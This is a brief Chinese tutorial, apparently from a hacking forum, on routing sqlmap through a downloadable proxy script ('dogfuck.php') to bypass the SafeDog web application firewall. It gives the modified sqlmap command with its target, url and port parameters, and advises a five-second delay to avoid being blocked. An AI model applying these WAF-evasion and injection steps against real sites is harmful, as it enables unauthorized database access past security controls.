通用型sqlmap绕过安全狗注入辅助脚本
先来写个存在注入的页面(3.php):

先证明下,如图3-2-1,图3-2-2:

图 3-2-1

图 3-2-2
然后将本文件下载:http://pan.baidu.com/s/1hq9Zc7E。搭建php环境取得本文件地址为:http://www.a.com/dog/dogfuck.php (www.a.com 修改的本地host文件,与localhost 意义一样,也可以上传到自己web服务器使用方便)
与平时使用sqlmap注入不同的是 -u参数
* 平时:sqlmap.py -u “http://www.xxxx.com/3.php” –data “buff=1&sub=ok” –delay 5 -p “buff” –dbs
* 现在:sqlmap.py -u “http://www.a.com/dog/dogfuck.php?target=www.xxxx.com&url=/3.php&port=80” –data “buff=1&sub=ok” –delay 5 -p “buff” –dbs
* 3个参数:target-目标域名 url-域名下的具体路径 port-端口
* http://www.a.com/dog/dogfuck.php?target=www.xxxxxx.com&url=/3.php&port=80
* 注入的时候记得使用–delay 延时5秒左右,频率过快安全狗一样会拦截。
以下为测试截图,如图3-2-3:

图 3-2-3
然后在猜解表的字段数了,如图3-2-4~图3-2-5:

图 3-2-4

图 3-2-5
然后注入成功,如图3-2-6~图3-2-7:

图 3-2-6

图 3-2-7
看一下服务器狗,如图3-2-8~图3-2-9:

图 3-2-8

华盟君